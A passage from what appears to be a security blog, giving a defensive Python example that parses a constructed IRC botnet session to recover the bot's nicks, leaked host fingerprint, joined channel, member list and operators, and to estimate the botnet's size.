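What an analyst pulls out of a capture like the one above, as an added Python example (not code from the post): a small parser for the IRC message shape (optional :prefix, command, parameters, trailing text after " :") and a pass over the session that records the nicks the bot registered and the 433 collision that made it renumber, the host fingerprint it leaks in the USER line (the capture above sends the full uname -a output, kernel version included), the channel it joined, the 353 NAMES replies that enumerate the room, and the @-prefixed operators. The exchange is constructed with the server, channel and nick prefix changed; ">" marks what the infected host sent and "<" what the server returned, the way a follow-stream view shows them.

```python
import re
from collections import Counter

# Constructed client/server exchange shaped like the capture in the post
# (server, channel and nick prefix changed). ">" is client -> server,
# "<" is server -> client.
SAMPLE_STREAM = [
    "> NICK bot-",
    "< NOTICE AUTH :*** Looking up your hostname..",
    "> USER ab12cd x.x.x.x irc.example.invalid :Linux host.example 2.6.9-42 #1 SMP i686 GNU/Linux",
    "< PING :1041065789",
    "> PONG :1041065789",
    "< :irc.example.invalid 433 * bot- :Nickname is already in use.",
    "> NICK bot-685",
    "< :irc.example.invalid 001 bot-685 :Welcome to the Internet Relay Network bot-685",
    "< :irc.example.invalid 251 bot-685 :There are 172 users and 0 invisible on 1 servers",
    "> JOIN #constructed",
    "< :bot-685!~ab12cd@203.0.113.5 JOIN :#constructed",
    "< :irc.example.invalid 353 bot-685 = #constructed :bot-685 bot-9337 bot-4554 bot-8354 @bot-",
    "< :irc.example.invalid 353 bot-685 = #constructed :bot-2934 bot-3103 +bot-8151 bot-4633",
    "< :irc.example.invalid 366 bot-685 #constructed :End of /NAMES list.",
]


def parse_irc(line):
    """Split one IRC message (RFC 1459 shape) into (prefix, command, params).
    The trailing parameter after ' :' is kept whole, spaces included."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    middle, sep, trailing = line.partition(" :")
    params = middle.split()
    if sep:
        params.append(trailing)
    return prefix, params[0], params[1:]


def analyze_stream(stream):
    """Collect what matters from a bot's session: nicks registered (and
    whether the server forced a renumber), the host fingerprint sent in
    USER, the channel joined, the room's members and its operators."""
    report = {"nicks_tried": [], "nick_collision": False, "user_realname": None,
              "channels": [], "members": [], "ops": []}
    for line in stream:
        direction, _, raw = line.partition(" ")
        _prefix, cmd, params = parse_irc(raw)
        if direction == ">":
            if cmd == "NICK":
                report["nicks_tried"].append(params[0])
            elif cmd == "USER":
                report["user_realname"] = params[-1]
            elif cmd == "JOIN":
                report["channels"].append(params[0])
        elif cmd == "433":  # ERR_NICKNAMEINUSE
            report["nick_collision"] = True
        elif cmd == "353":  # RPL_NAMREPLY, one chunk of the member list
            for name in params[-1].split():
                if name.startswith("@"):
                    report["ops"].append(name[1:])
                report["members"].append(name.lstrip("@+"))
    return report


def nick_pattern(members):
    """Bots built from one template register as PREFIX-<digits>; return the
    dominant prefix, how many members carry it, and the total member count,
    which is the size of the botnet as seen from this one server."""
    prefixes = Counter(re.sub(r"\d+$", "", n) for n in members)
    prefix, n = prefixes.most_common(1)[0]
    return prefix, n, len(members)


if __name__ == "__main__":
    r = analyze_stream(SAMPLE_STREAM)
    prefix, n, total = nick_pattern(r["members"])
    print(f"joined {r['channels']} as {r['nicks_tried'][-1]}; {n}/{total} members match {prefix!r}")
    print(f"operators: {r['ops']}; USER realname: {r['user_realname']}")
```

The members list and the operators are the two things to keep from a capture like this: the first tells you how many other compromised hosts sit in the same channel, the second tells you which handle the channel takes commands from, and the USER line tells you exactly what the attacker now knows about your kernel.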

About this Archive

This page is an archive of recent entries in the Security category.

Random is the previous category.

Find recent content on the main index or look in the archives to find all content.